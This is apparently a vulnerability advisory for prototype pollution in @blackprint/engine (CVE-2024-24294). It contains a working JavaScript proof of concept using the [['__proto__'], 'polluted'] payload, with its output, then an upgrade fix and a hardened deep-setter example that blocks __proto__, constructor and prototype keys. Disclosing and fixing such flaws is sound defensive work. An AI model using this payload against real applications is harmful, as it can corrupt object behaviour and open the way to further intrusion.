Versions of @blackprint/engine from 0.8.12 to 0.9.1 are vulnerable to prototype pollution. The function setDeepProperty
recursively assigns the source property to the destination without proper validation, which an attacker can exploit to modify the prototype of Object
using a payload like: [["__proto__"], "..."]
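Proof of concept:
(async () => {
    const lib = await import('@blackprint/engine');
    // A fresh object that should inherit nothing beyond the default Object.prototype.
    var victim = {};
    console.log("Before Attack: ", JSON.stringify(victim.__proto__));
    try {
        // The path segment ["__proto__"] makes the setter walk into Object.prototype.
        lib.default._utils.setDeepProperty({}, [["__proto__"], "polluted"], true);
    } catch (e) { }
    console.log("After Attack: ", JSON.stringify(victim.__proto__));
    // Clean up so the polluted key does not persist in the running process.
    delete Object.prototype.polluted;
})();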
Output:
Before Attack: {}
After Attack: {"polluted":true}
Output of a successful fix:
Before Attack: {}
After Attack: {}
Fix: upgrade to version 0.9.2 or a later version.
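The validation such a deep setter needs, as an added example: this is not the @blackprint/engine code or its fix. The name safeSetDeepProperty and its (obj, path, value) signature are assumptions. It normalizes each path segment to a string before checking it, because an array segment like ["__proto__"] is coerced to the key "__proto__" on property access.

```javascript
// Added example: a hardened deep setter, NOT the @blackprint/engine implementation.
// safeSetDeepProperty and its (obj, path, value) signature are assumptions.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const own = (v) => ({ value: v, writable: true, enumerable: true, configurable: true });

function safeSetDeepProperty(obj, path, value) {
  if (!Array.isArray(path) || path.length === 0) {
    throw new TypeError('path must be a non-empty array');
  }
  // Property keys are coerced to strings on access, so ["__proto__"] behaves
  // exactly like "__proto__". Normalize first, then validate the normalized key.
  const keys = path.map((segment) => {
    if (typeof segment === 'symbol') throw new TypeError('symbol keys are not allowed');
    const key = String(segment);
    if (FORBIDDEN_KEYS.has(key)) {
      throw new Error('refusing to traverse forbidden key: ' + key);
    }
    return key;
  });
  let node = obj;
  for (let i = 0; i < keys.length - 1; i++) {
    const key = keys[i];
    // Descend only into own properties, so inherited objects are never reached.
    const hasOwn = Object.prototype.hasOwnProperty.call(node, key);
    if (!hasOwn || node[key] === null || typeof node[key] !== 'object') {
      // defineProperty creates an own data property and never invokes a setter.
      Object.defineProperty(node, key, own({}));
    }
    node = node[key];
  }
  Object.defineProperty(node, keys[keys.length - 1], own(value));
  return obj;
}

// Constructed inputs: the advisory's payload shape and a benign path.
function demo() {
  const results = { blocked: false, polluted: false, benign: null };
  try {
    safeSetDeepProperty({}, [['__proto__'], 'polluted'], true);
  } catch (e) {
    results.blocked = true;
  }
  results.polluted = ({}).polluted !== undefined;
  results.benign = safeSetDeepProperty({}, ['a', 'b'], 1).a.b;
  return results;
}
console.log(demo());
```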
References:
https://github.com/Blackprint/engine-js/commit/bd6b965b03c467e7a58ab0cb89b9172fa5e07013
https://nvd.nist.gov/vuln/detail/CVE-2024-24294